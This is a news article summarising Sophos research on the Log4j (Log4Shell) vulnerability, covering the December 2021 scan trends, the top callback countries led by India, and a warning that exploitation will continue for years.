While the world hasn’t seen the mass exploitation of the Log4j security flaw, it has been buried deep in many digital applications and products, that will likely be a target for exploitation for years to come— and India is the top call back destination that vulnerable devices are reaching out to, revealed a new research by Sophos.
Thanks to the quick response by the global security companies, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, said Chester Wisniewski, principal research scientist at Sophos, in a blog. However, Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action.
Log4j vulnerability disrupted severs of major web tech giant such as Microsoft, Amazon, Apple, etc. For the uninitiated, Log4j is a very common logging library used by applications across the world. Logging lets developers see all the activity of an application. The vulnerability is serious because exploiting it could allow hackers to control java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system.
Data by Sophos shows the top call back destinations worldwide that vulnerable (unpatched) devices are reaching out to in order to retrieve a Java payload. This brings India into the number one position and highlights Turkey, Brazil, US and even Australia. It is difficult to speculate as to why these regions are top destinations for call backs. One reason that Wisniewski gives is active participants in bug bounty programs, who are hoping to earn money by being the first to alert organizations that they are exposed.
Volume of exploit
Wisniewski explains that in the first few days, the volume of scans was moderate, however within a week, there was a significant increase in scan detection, with numbers peaking between December 20 and December 23, 2021.
From late December through January 2022, however, the curve of attack attempts flattened out and declined. “This doesn’t mean the threat level declined too: by this time, an ever-greater percentage of detections were likely real attacks, with fewer coming from researchers monitoring the latest patching status,” the researcher noted.
..the threat continues
According to Wisniewski , the threat is not over yet. “Just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk.”
As others have pointed out, some of the initial attack scans may have resulted in attackers securing access to a vulnerable target, but not actually abusing that access to deliver malware, for instance – so the successful breach remains undetected.
In the past Sophos has observed countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy the patches, and then waiting months before using that access in an attack.
Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and will become a favourite target for penetration testers and nation-state supported threat actors alike. “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever,” the researcher added.